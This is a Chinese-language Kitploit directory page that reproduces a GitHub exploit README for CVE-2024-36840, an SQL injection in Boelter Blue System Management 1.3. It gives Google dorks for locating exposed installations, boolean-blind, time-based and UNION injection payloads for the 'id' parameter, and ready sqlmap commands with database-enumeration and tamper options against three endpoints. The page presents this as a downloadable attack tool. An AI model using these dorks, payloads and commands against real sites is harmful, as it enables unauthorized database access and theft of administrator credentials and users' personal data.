Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-36840-Exploit — # 漏洞利用:CVE-2024-36840:Boelter Blue System Management(版本 1.3)中的 SQL 注入漏洞 | Kitploit
工具/GitHubGitHub/theexploiters/cve-2024-36840-exploit
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubtheexploiters/cve-2024-36840-exploit

CVE-2024-36840-Exploit

# 漏洞利用:CVE-2024-36840:Boelter Blue System Management(版本 1.3)中的 SQL 注入漏洞

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
2181年前尚未审核
分享

CVE-2024-36840:Boelter Blue 系统管理软件(1.3 版)中的 SQL 注入漏洞

漏洞利用详情

  • 漏洞利用标题:Boelter Blue 系统管理软件(1.3 版)中的 SQL 注入漏洞

  • 原始 Google Dork:inurl:"Powered by Boelter Blue"(无效(搜索中零个 URL))

  • Theexploiters 提供的 Google Dork:intext:"Powered by Boelter Blue"(有效)

  • 日期:2024-06-04

  • 漏洞利用作者:CBKB (DeadlyData, R4d1x)

  • 厂商主页:Boelter Blue

  • 软件链接:Google Play Store

  • 版本:1.3

  • 测试环境:Linux Debian 9 (stretch)、Apache 2.4.25、MySQL >= 5.0.12

  • CVE:CVE-2024-36840

漏洞描述

在 Boelter Blue 系统管理软件(1.3 版)中发现了多个 SQL 注入漏洞。这些漏洞允许攻击者通过各种参数注入并执行任意 SQL 命令。成功利用这些漏洞可能导致未授权访问、数据泄露以及潜在的账户接管。

受影响的参数及漏洞利用详情:

  1. 参数:id(GET)

    • 类型:基于布尔的盲注
    • 载荷:id=10071 AND 4036=4036
  2. 类型:基于时间的盲注

    • 载荷:id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
  3. 类型:UNION 查询

    • 载荷:id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...

易受攻击的端点

  1. news_details.php?id

    • 示例:https://www.example.com/news_details.php?id=10071
    • 利用方式:
      root@kitploit:~
      sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
      
  2. services.php?section

    • 示例:https://www.example.com/services.php?section=5081
    • 利用方式:
      root@kitploit:~
      sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
      
  3. location_details.php?id

    • 示例:https://www.example.com/location_details.php?id=836
    • 利用方式:
      root@kitploit:~
      sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
      

影响

  • 未授权数据库访问:漏洞利用可能导致对数据库的未授权访问,使攻击者能够提取敏感信息。
  • 数据泄露:管理员凭据、用户个人身份信息(PII)和购买记录等敏感数据可能遭到泄露。
  • 账户接管:攻击者可能接管用户账户。
  • 完全控制:攻击者可获得对受影响应用程序的完全控制权,导致严重的安全后果。

致谢

  • 发现者:CBKB (DeadlyData, R4d1x)

参考

  • CyberDepot 漏洞报告
  • CVE-2024-36840

Repo View Counter

下载工具